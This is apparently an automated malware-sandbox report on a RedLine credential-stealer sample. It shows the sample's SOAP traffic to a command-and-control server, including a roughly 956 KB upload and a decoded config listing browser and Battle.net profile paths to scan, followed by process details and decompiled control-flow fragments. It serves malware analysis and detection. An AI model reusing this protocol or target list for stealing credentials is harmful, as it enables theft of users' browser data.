                      Jun 28, 2024 12:02:04.712356091 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712368965 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712382078 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712393045 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712404966 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712416887 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712429047 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712454081 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712465048 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712476969 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712502003 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712513924 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712526083 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712537050 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712548971 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712560892 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712573051 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712584972 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712596893 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712610006 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712621927 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712632895 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712645054 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712656975 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712667942 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712678909 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712691069 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712702036 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712713003 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712724924 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712735891 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712749958 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712765932 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712778091 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712789059 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712800980 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712812901 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712824106 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712836027 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:05.406347990 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:05.426808119 CEST497337474192.168.2.4185.38.142.10
                      TimestampSource PortDest PortSource IPDest IP
                      Jun 28, 2024 12:01:59.522531986 CEST6509053192.168.2.41.1.1.1
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jun 28, 2024 12:01:59.522531986 CEST192.168.2.41.1.1.10xbea8Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jun 28, 2024 12:01:59.529591084 CEST1.1.1.1192.168.2.40xbea8No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      • 185.38.142.10:7474
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449731185.38.142.1074745052C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 12:01:52.718724012 CEST239OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.38.142.10:7474
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jun 28, 2024 12:01:53.297841072 CEST25INHTTP/1.1 100 Continue
                      Jun 28, 2024 12:01:53.424422979 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 28 Jun 2024 10:01:53 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jun 28, 2024 12:01:58.482003927 CEST222OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.38.142.10:7474
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 28, 2024 12:01:58.652350903 CEST25INHTTP/1.1 100 Continue
                      Jun 28, 2024 12:01:59.468247890 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 4744
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 28 Jun 2024 10:01:58 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449733185.38.142.1074745052C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 12:02:03.067217112 CEST220OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.38.142.10:7474
                      Content-Length: 956438
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 28, 2024 12:02:03.705415010 CEST25INHTTP/1.1 100 Continue
                      Jun 28, 2024 12:02:04.502142906 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 28 Jun 2024 10:02:04 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Jun 28, 2024 12:02:04.504403114 CEST216OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.38.142.10:7474
                      Content-Length: 956430
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 28, 2024 12:02:04.678847075 CEST25INHTTP/1.1 100 Continue
                      Jun 28, 2024 12:02:05.406347990 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 28 Jun 2024 10:02:04 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:06:01:50
                      Start date:28/06/2024
                      Path:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe"
                      Imagebase:0xff0000
                      File size:97'792 bytes
                      MD5 hash:6BD0EFCA19C8A21373008DD422AAF39B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1781147161.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:06:01:50
                      Start date:28/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:13.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:46
                        Total number of Limit Nodes:1
                        execution_graph 27585 6c26401 27586 6c2639c 27585->27586 27587 6c2640a 27585->27587 27591 6c274a0 27586->27591 27595 6c27491 27586->27595 27588 6c263bd 27592 6c274e8 27591->27592 27593 6c274f1 27592->27593 27599 6c27038 27592->27599 27593->27588 27596 6c2742d 27595->27596 27596->27595 27597 6c274f1 27596->27597 27598 6c27038 LoadLibraryW 27596->27598 27597->27588 27598->27597 27600 6c27690 LoadLibraryW 27599->27600 27602 6c27705 27600->27602 27602->27593 27623 3140871 27627 31408d8 27623->27627 27632 31408c8 27623->27632 27624 3140889 27628 31408fa 27627->27628 27637 3140ce0 27628->27637 27641 3140ce8 27628->27641 27629 314093e 27629->27624 27633 31408fa 27632->27633 27635 3140ce0 GetConsoleWindow 27633->27635 27636 3140ce8 GetConsoleWindow 27633->27636 27634 314093e 27634->27624 27635->27634 27636->27634 27638 3140d26 GetConsoleWindow 27637->27638 27640 3140d56 27638->27640 27640->27629 27642 3140d26 GetConsoleWindow 27641->27642 27644 3140d56 27642->27644 27644->27629 27603 3140848 27604 3140856 27603->27604 27607 3141251 27604->27607 27608 314128b 27607->27608 27609 31413c2 27608->27609 27615 3141870 27608->27615 27619 3141862 27608->27619 27610 3141432 27609->27610 27613 3141870 KiUserExceptionDispatcher 27609->27613 27614 3141862 KiUserExceptionDispatcher 27609->27614 27613->27610 27614->27610 27617 3141893 27615->27617 27616 3141897 27616->27608 27617->27616 27618 31418ba KiUserExceptionDispatcher 27617->27618 27618->27616 27620 3141893 27619->27620 27621 31418ba KiUserExceptionDispatcher 27620->27621 27622 3141897 27620->27622 27621->27622 27622->27608
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1785518339.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6c20000_a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_dq$(_dq$,hq$4cdq$4cdq$Hhq$Nvcq$$dq$$dq$$dq$cdq$cdq
                        • API String ID: 0-872558548
                        • Opcode ID: d2eaf538e02f1112a2ece8110e05705ce341cace7a7c21e444f41b232ff82b64
                        • Instruction ID: 11074c24d44bd614fcf83884d40885070ab6660a08676682e0977a256768d1cd
                        • Opcode Fuzzy Hash: d2eaf538e02f1112a2ece8110e05705ce341cace7a7c21e444f41b232ff82b64
                        • Instruction Fuzzy Hash: 23828874B002258FCB959BBE841066E6AD7BFCC741F21486ED90ADB385EE34CD418BE5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 415 6c2dad0-6c2db00 418 6c2db02-6c2db0b 415->418 419 6c2db18-6c2db28 415->419 604 6c2db0d call 6c2dad0 418->604 605 6c2db0d call 6c2dac4 418->605 423 6c2db61-6c2db6c 419->423 424 6c2db2a-6c2db40 419->424 420 6c2db13 422 6c2dd25-6c2dd31 420->422 427 6c2db7b-6c2db87 423->427 428 6c2db6e-6c2db79 423->428 429 6c2db42-6c2db51 424->429 430 6c2db56-6c2db5c 424->430 427->422 428->427 434 6c2db8c-6c2dbae 428->434 429->422 430->422 438 6c2dbb0-6c2dbd0 434->438 439 6c2dbf5-6c2dc0f 434->439 444 6c2dd23 438->444 445 6c2dc15-6c2dc25 439->445 446 6c2dcef-6c2dd03 439->446 444->422 447 6c2dc27-6c2dc2d 445->447 448 6c2dc8b-6c2dca8 445->448 455 6c2dd13-6c2dd19 446->455 456 6c2dd05-6c2dd11 446->456 450 6c2dc3b-6c2dc89 447->450 451 6c2dc2f-6c2dc31 447->451 462 6c2dcaf-6c2dcd0 448->462 450->462 451->450 459 6c2dd34-6c2de01 455->459 460 6c2dd1b-6c2dd21 455->460 456->422 478 6c2de07-6c2de33 call 6c2da00 459->478 479 6c2decf-6c2dedd 459->479 460->422 460->444 462->444 489 6c2de54-6c2de58 478->489 490 6c2de35-6c2de4f 478->490 482 6c2df39-6c2df3d 479->482 483 6c2dedf-6c2def2 479->483 486 6c2df3f-6c2df4b 482->486 487 6c2df4d-6c2df54 482->487 483->482 495 6c2def4-6c2df13 483->495 486->487 496 6c2df57-6c2df7f 486->496 487->496 492 6c2de5a-6c2de63 489->492 493 6c2de79 489->493 508 6c2e2a3-6c2e2af 490->508 497 6c2de65-6c2de68 492->497 498 6c2de6a-6c2de6d 492->498 499 6c2de7c-6c2de81 493->499 512 6c2e2a0 495->512 519 6c2e195-6c2e1a0 496->519 520 6c2df85-6c2df93 496->520 501 6c2de77 497->501 498->501 499->479 502 6c2de83-6c2de87 499->502 501->499 505 6c2dec0-6c2dec6 502->505 506 6c2de89-6c2dea4 502->506 505->479 506->505 515 6c2dea6-6c2deac 506->515 512->508 517 6c2e2b2-6c2e2c6 515->517 518 6c2deb2-6c2debb 515->518 531 6c2e2cd-6c2e330 517->531 518->508 527 6c2e1a2-6c2e1b9 519->527 528 6c2e1d5-6c2e20e 519->528 524 6c2df99-6c2dfac 520->524 525 6c2e43d-6c2e454 520->525 536 6c2dfd7-6c2dfe5 524->536 537 6c2dfae-6c2dfbb 524->537 527->528 544 6c2e1bb-6c2e1c1 527->544 534 6c2e210-6c2e227 528->534 535 6c2e264-6c2e277 528->535 548 6c2e337-6c2e367 531->548 550 6c2e230-6c2e232 534->550 539 6c2e279 535->539 536->525 547 6c2dfeb-6c2e000 536->547 537->536 545 6c2dfbd-6c2dfc3 537->545 539->512 544->548 549 6c2e1c7-6c2e1d0 544->549 545->531 551 6c2dfc9-6c2dfd2 545->551 557 6c2e002-6c2e01b 547->557 558 6c2e020-6c2e098 547->558 568 6c2e3d3-6c2e436 548->568 569 6c2e369-6c2e3cc 548->569 549->508 553 6c2e253-6c2e262 550->553 554 6c2e234-6c2e251 550->554 551->508 553->534 553->535 554->539 570 6c2e09e-6c2e0a5 557->570 558->570 568->525 569->568 570->519 572 6c2e0ab-6c2e0e4 570->572 581 6c2e150-6c2e163 572->581 582 6c2e0e6-6c2e10d call 6c2da00 572->582 585 6c2e165 581->585 596 6c2e12e-6c2e14e 582->596 597 6c2e10f-6c2e12c 582->597 585->519 596->581 596->582 597->585 604->420 605->420
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1785518339.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6c20000_a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'dq$4cdq$4cdq$4cdq$4|iq$$dq$$dq$$dq$$dq$$dq
                        • API String ID: 0-2071280071
                        • Opcode ID: ab47ef1ce79cca8f7f4b3bbff0a577e2e2e57f696bd7c0440fb20d8e40d997af
                        • Instruction ID: a71adfb55289d1d31820c4af4492f5848ece3d38cbf098990746c7588c9bb893
                        • Opcode Fuzzy Hash: ab47ef1ce79cca8f7f4b3bbff0a577e2e2e57f696bd7c0440fb20d8e40d997af
                        • Instruction Fuzzy Hash: D9422070B0022A9FDB54DF79C854AAEB7F6BF88300F148469D90AEB355DB349D41CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 606 6c237c0-6c23801 608 6c23803-6c2380b 606->608 609 6c2380d-6c23811 606->609 610 6c23816-6c2381b 608->610 609->610 611 6c23824-6c2382d 610->611 612 6c2381d-6c23822 610->612 613 6c23830-6c23832 611->613 612->613 614 6c23838-6c23851 call 6c23638 613->614 615 6c23b9e-6c23bc8 613->615 619 6c23853-6c23863 614->619 620 6c2389f-6c238a6 614->620 640 6c23bcf-6c23c0f 615->640 624 6c23b36-6c23b53 619->624 625 6c23869-6c23881 619->625 622 6c238ab-6c238bb 620->622 623 6c238a8 620->623 626 6c238cb-6c238e8 622->626 627 6c238bd-6c238c9 622->627 623->622 629 6c23b5c-6c23b65 624->629 628 6c23887-6c2388e 625->628 625->629 633 6c238ec-6c238f8 626->633 627->633 630 6c23894-6c2389e 628->630 631 6c23b6d-6c23b97 628->631 629->631 631->615 634 6c238fa-6c238fc 633->634 635 6c238fe 633->635 638 6c23901-6c23903 634->638 635->638 639 6c23909-6c2391e 638->639 638->640 642 6c23920-6c2392c 639->642 643 6c2392e-6c2394b 639->643 671 6c23c16-6c23c56 640->671 645 6c2394f-6c2395b 642->645 643->645 647 6c23964-6c2396d 645->647 648 6c2395d-6c23962 645->648 649 6c23970-6c23972 647->649 648->649 651 6c239fa-6c239fe 649->651 652 6c23978-6c2397a call 6c23cb8 649->652 655 6c23a32-6c23a4a call 6c23500 651->655 656 6c23a00-6c23a1e 651->656 657 6c23980-6c239a0 call 6c23638 652->657 675 6c23a4f-6c23a79 call 6c23638 655->675 656->655 668 6c23a20-6c23a2d call 6c23638 656->668 665 6c239a2-6c239ae 657->665 666 6c239b0-6c239cd 657->666 669 6c239d1-6c239dd 665->669 666->669 668->619 673 6c239e6-6c239ef 669->673 674 6c239df-6c239e4 669->674 698 6c23c5d-6c23cb5 671->698 677 6c239f2-6c239f4 673->677 674->677 683 6c23a7b-6c23a87 675->683 684 6c23a89-6c23aa6 675->684 677->651 677->671 685 6c23aaa-6c23ab6 683->685 684->685 687 6c23ab8-6c23aba 685->687 688 6c23abc 685->688 689 6c23abf-6c23ac1 687->689 688->689 689->619 691 6c23ac7-6c23ad7 689->691 692 6c23ae7-6c23b04 691->692 693 6c23ad9-6c23ae5 691->693 695 6c23b08-6c23b14 692->695 693->695 696 6c23b16-6c23b1b 695->696 697 6c23b1d-6c23b26 695->697 699 6c23b29-6c23b2b 696->699 697->699 707 6c23cd0-6c23cd6 698->707 708 6c23cb7 698->708 699->698 701 6c23b31 699->701 701->614 708->707
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1785518339.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6c20000_a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.jbxd
                        Similarity
                        • API ID:
                        • String ID: Hhq$Hhq$Hhq$Hhq$Hhq
                        • API String ID: 0-1427472961
                        • Opcode ID: 0be4eb0d4502c4ea55d940ce2d96a82ce4be1624350f662f687fe3c83f39a40a
                        • Instruction ID: 55fc84f5c13c82e40efdeac752ed7cffe050896949ce87b235cc3f3a56efe05b
                        • Opcode Fuzzy Hash: 0be4eb0d4502c4ea55d940ce2d96a82ce4be1624350f662f687fe3c83f39a40a
                        • Instruction Fuzzy Hash: 5CF17131E142A7CFCB55DF75C4502ADFBB2BF85300F14866ED84AAB241DB789A85CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1007 6c21210-6c2122f 1009 6c21235-6c21240 1007->1009 1010 6c212d9-6c212e0 1007->1010 1011 6c21242-6c21248 1009->1011 1012 6c212b1-6c212bd 1009->1012 1013 6c212e3-6c21323 1011->1013 1014 6c2124e-6c21269 call 6c20938 1011->1014 1017 6c212c7-6c212d3 1012->1017 1018 6c212bf 1012->1018 1022 6c21325-6c21327 1013->1022 1023 6c21329 1013->1023 1027 6c21294-6c212a0 1014->1027 1028 6c2126b-6c21292 call 6c20a00 1014->1028 1017->1009 1017->1010 1018->1017 1026 6c2132c-6c21345 1022->1026 1023->1026 1034 6c21347 1026->1034 1035 6c2137f-6c2138f 1026->1035 1027->1013 1030 6c212a2-6c212a4 1027->1030 1033 6c212a8-6c212af 1028->1033 1030->1033 1033->1011 1033->1012 1036 6c2134a-6c21363 1034->1036 1038 6c21390-6c21398 1036->1038 1039 6c21365-6c2137d 1036->1039 1043 6c2139a-6c213f6 1038->1043 1044 6c213f8 1038->1044 1039->1035 1039->1036 1043->1044 1045 6c213fa-6c2140c 1044->1045 1049 6c2140e-6c2187d 1045->1049 1122 6c21885-6c2188d 1049->1122 1123 6c21895-6c218b2 1122->1123
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1785518339.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6c20000_a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.jbxd
                        Similarity
                        • API ID:
                        • String ID: LRdq$S
                        • API String ID: 0-1936851428
                        • Opcode ID: 70e02527fdf5c2e688d0ecf06a4928738f1233cbe2e117c4f06a4d221b53e626
                        • Instruction ID: 0a4bccc4b7c90670dc03c60dc5f4ac97eb8dcd51f59656e6c66291f91ec955c5
                        • Opcode Fuzzy Hash: 70e02527fdf5c2e688d0ecf06a4928738f1233cbe2e117c4f06a4d221b53e626
                        • Instruction Fuzzy Hash: 08124E74B0021A9FCB44DBA5C955AAEBBB7FF88340F54842DE506AB394CB34AC41DB64
                        Memory Dump Source
                        • Source File: 00000000.00000002.1781034298.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3140000_a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0117dac318dc22c5190b5a707ecc8c8492004d5a9099048a898acdc7eb4ecde
                        • Instruction ID: 868f555b7d0dea478873cb12060042ec8ca3d059619c5efdc348cea859aa7775
                        • Opcode Fuzzy Hash: b0117dac318dc22c5190b5a707ecc8c8492004d5a9099048a898acdc7eb4ecde
                        • Instruction Fuzzy Hash: 6D82FA74B102199FCB14DF68D899B6DBBB2BF88301F1484A9E50A9B3A5DF349D81CF50
                        Memory Dump Source
